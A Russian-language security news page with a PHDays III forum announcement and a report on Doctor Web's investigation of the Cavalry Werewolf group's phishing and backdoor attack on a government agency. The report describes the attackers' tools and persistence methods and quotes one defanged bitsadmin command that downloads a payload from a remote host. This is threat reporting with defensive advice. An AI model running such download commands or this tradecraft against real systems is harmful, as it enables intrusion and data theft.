Один день до старта форума по практической безопасности PHDays III

Один день до старта форума по практической безопасности PHDays III

В программе мероприятия, которое третий год подряд организует компания Positive Technologies, свыше 50 докладов и мастер-классов, 15 конкурсов и онлайн-соревнований, соперничество молодых ученых в Young School, битва хакеров PHDays CTF, бизнес-секции и круглые столы.

В этом году форум пройдет в московском Центре международной торговли и соберет наибольшее число участников в своей истории — более 2000 человек. На двое суток ЦМТ превратится в огромный исследовательский полигон, объединяющий на одной площадке специалистов с разных сторон баррикад, теорию и практику, профессиональную дискуссию и захватывающие соревнования.

Кто?

На PHDays III выступят основатель The Hacker's Choice Марк Хойзе (van Hauser), исследователь Трэвис Гудспид (Travis Goodspeed), основатель China Eagle Union Тао Вань (Tao Wan), Михаил Емельянников («Емельянников, Попова и партнеры»), Алексей Лукацкий (Cisco), Гаральд Бандурин («РусГидро»), Виталий Лютиков (ФСТЭК), инструктор академии Вест-Пойнт Девиант Оллам, Михел Остерхоф (RSA EMC) и многие другие.

Доклады

Выступающие расскажут об особенностях обеспечения безопасности АСУ ТП и критически важных объектов, о проблемах защищенности систем ДБО и банкоматов, об уязвимостях телекоммуникационных сетей, бизнес-приложений и ERP-систем — и затронут множество других интересных тем:

  • банковские шпионы для смартфонов;
  • способы защиты от DDoS;
  • противодействие атакам нулевого дня;
  • особенности черного хакерского рынка;
  • защита корпоративных и государственных организаций от многоходовых АРТ-атак;
  • IP-камеры против владельцев;
  • расследование действий злоумышленников в корпоративных сетях;
  • взлом телевизоров Smart TV;
  • слежка за мобильным телефоном и RFID-картой;
  • современные технологии обеспечения физической безопасности.

 

В программе PHDays III запланированы также более 20 пятнадцатиминутных стендапов в формате Fast Track, авторы которых раскроют ряд неожиданных тем, от хакерских экспериментов с системами развлечений на борту самолетов до массового взлома популярнейших систем видеонаблюдения.

Бизнес-программа

В ходе 14 бизнес-секций и круглых столов будут рассмотрены трудности сертификации, потенциал кибероружия, специфика обеспечения безопасности промышленных систем, тактика защиты секретов в российском суде, проблемы молодых специалистов. В обсуждениях примут участие представители Минкомсвязи, Совета Федерации, ЦИБ ФСБ, Defcon Russia, ФСТЭК, а также CIO и CISO крупнейших компаний, исследователи защищенности и разработчики.

Алексей Лукацкий, бизнес-консультант по ИБ компании Cisco: «Компания Cisco уже третий год подряд поддерживает форум PHDays, проводимый нашим технологическим партнером Positive Technologies. Мы считаем, что это одно из немногих мероприятий в России, в котором найден баланс между глубоко техническими, правовыми и бизнес-темами, связанными с информационной безопасностью. Именно поэтому посещение данного мероприятия считается для многих заказчиков Cisco обязательным. И именно поэтому мы поддерживаем форум PHDays».

Практические занятия

Под руководством российских и иностранных специалистов участники Hands-On Lab разработают защищенное веб-приложение, освоят азы киберрасследований, получат представление о способах атаки на SAP, своими руками построят шелл-код и овладеют основными приемами анализа защищенности Android-приложений.

Кобцев Роман Юрьевич, директор Департамента развития и маркетинга ОАО «ЭЛВИС-ПЛЮС»: «Форум PHD носит самый практический характер из всех конференций по информационной безопасности в России, так как смог в полной мере охватить на одной площадке все вопросы информационной безопасности бизнеса и государства - от глубоко технических до правовых и организационных».

Конкурсы и соревнования

Конкурсная программа форума позволит участникам сделать то, что в реальной жизни большинству людей совершенно недоступно. В железнодорожном шоу Choo Choo Pwn на примере модели поезда, управляемого настоящей АСУ ТП, хакеры будут искать уязвимости, позволяющие потенциальному злоумышленник устроить техногенную аварию. В аттракционе «Лабиринт», участником которого может стать любой желающий, за один час надо будет преодолеть лазерное поле и датчики движения, открыть секретные двери, очистить комнату от «жучков», сразиться в интеллектуальном поединке с искусственным разумом и обезвредить бомбу. Пройдет конкурс по взлому банкомата, в систему которого заложены реальные уязвимости, обнаруженные в действующих системах, а на международные соревнования PHDays CTF приедут 10 хакерских команд со всего мира, в том числе российские. Состоится также финальный конкурс работ молодых ученых по информационной безопасности PHDays Young School.

Александр Гостев, главный антивирусный эксперт «Лаборатории Касперского»: «Мы рады тому, что Positive Hack Days вновь соберёт в Москве экспертов в области информационной безопасности и всех интересующихся этой темой. Конференция отличается невероятным энтузиазмом её участников и дружеской неформальной атмосферой, в которой обсуждение очень важных вопросов происходит так легко и естественно. Широта тем форума в этом году  – от противодействия мошенничеству до кибервойн – лишь подчёркивает актуальность особо тщательной защиты информации сегодня. Надеюсь, что наша экспертиза и широкий международный опыт в защите информационных сетей и в расследовании сложных киберпреступлений, в частности масштабных операций по кибершпионажу, помогут участникам PHDays лучше понять текущую ситуацию в сфере информационной безопасности».

PHDays III в 7 странах мира

Одновременно со стартом форума свои двери распахнут 17 хакерских локаций в 7 странах мира. К инициативе PHDays Everywhere уже присоединились хакспейсы в Абу-Даби, Бир-Зейте, Каире, Колламе, Тунисе, Киеве, Львове, Санкт-Петербурге, Владивостоке, Воронеже, Калининграде, Краснодаре, Новосибирске, Омске, Саратове и Уфе.

«Positive Hack Days – место встречи людей из разных миров – теории и практики, бизнеса и творчества. Тем не менее участников объединяет одно – живой интерес к теме информационной безопасности. В этом году наша компания решила использовать форум для поддержки молодых талантливых ребят,  которые связывают свое профессиональное будущее с защитой информации,  лучших мы будем рады видеть в нашей команде.  На стенде «Астерос» желающие смогут принять участие в проекте по созданию нового лица ИБ России. Каким оно получится, зависит от каждого из нас», - отметил Сергей Коношенко, руководитель технической дирекции «Астерос Информационная безопасность».

 

Подробно ознакомиться с программой Positive Hack Days можно на официальном сайте форума.

Регистрация на форум продолжается.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru